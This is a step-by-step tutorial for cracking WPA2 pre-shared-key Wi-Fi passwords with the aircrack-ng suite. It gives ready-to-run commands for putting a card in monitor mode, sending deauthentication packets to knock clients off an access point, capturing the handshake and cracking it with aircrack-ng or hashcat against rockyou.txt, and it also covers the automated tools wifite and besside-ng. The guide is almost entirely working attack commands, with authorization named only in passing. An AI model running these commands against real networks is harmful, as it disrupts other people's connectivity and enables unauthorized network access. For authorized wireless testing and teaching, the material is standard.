WPA2 PSK (Pre-Shared Key) cracking follows a systematic 6-step process:
- Place - Put wireless card into monitor mode
- Discover - Discover information about the network (Channel, BSSID)
- Select - Select network and capture data
- Perform - Perform deauth attack
- Capture - Capture WPA handshake
- Attempt - Attempt to crack the handshake
First, identify your wireless interface and put it into monitor mode:
# Check wireless interfaces
iwconfig
# Kill processes that might interfere
sudo airmon-ng check kill
# Put interface into monitor mode
sudo airmon-ng start wlan0
# Verify monitor mode is active
iwconfigYour interface should now show as wlan0mon or similar.
Use airodump-ng to discover networks and gather information:
# Scan for networks
sudo airodump-ng wlan0monLook for:
- BSSID (MAC address of the access point)
- Channel number
- ESSID (network name)
- Encryption type (WPA2)
- Connected clients (stations)
Focus on a specific network and start capturing:
# Capture specific network
sudo airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0monExample:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0monThis will:
- Monitor channel 6
- Focus on the specific BSSID
- Save capture to files starting with "capture"
In a new terminal, perform a deauthentication attack to force clients to reconnect:
# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon
# Deauth specific client
sudo aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0monExample:
# Deauth all clients
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0monParameters:
-0= Deauthentication attack10= Number of deauth packets to send-a= Access Point BSSID-c= Client MAC address (optional)
Monitor the airodump-ng output for the handshake capture:
WPA handshake: AA:BB:CC:DD:EE:FF
When you see this message, the handshake has been captured successfully.
Use aircrack-ng or hashcat to crack the captured handshake:
# Crack with wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Crack specific network
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap# Convert .cap to .hccapx format
cap2hccapx capture-01.cap capture.hccapx
# Crack with hashcat (mode 2500 for WPA/WPA2)
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt
# For newer hashcat versions (mode 22000)
hcxpcapngtool -o capture.22000 capture-01.cap
hashcat -m 22000 capture.22000 /usr/share/wordlists/rockyou.txt- Wireless adapter capable of monitor mode and packet injection
- Target network must have connected clients
- Legal authorization to test the network
- Patience: Wait for natural client connections if deauth doesn't work
- Multiple attempts: Try different deauth techniques
- Good wordlists: Use comprehensive wordlists like rockyou.txt
- Hardware: Use a good wireless adapter (e.g., Alfa AWUS036ACS)
- No handshake captured: Try different deauth methods or wait longer
- Weak signal: Get closer to the target network
- No clients: Some networks may not have active clients
Automated WPA2 cracking tool:
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txtAnother automated approach:
sudo besside-ng -c [CHANNEL] -b [BSSID] wlan0mon- WPA2 PSK cracking requires capturing the 4-way handshake
- Deauth attacks force clients to reconnect and expose the handshake
- Success depends on password strength and wordlist quality
- Always ensure you have proper authorization before testing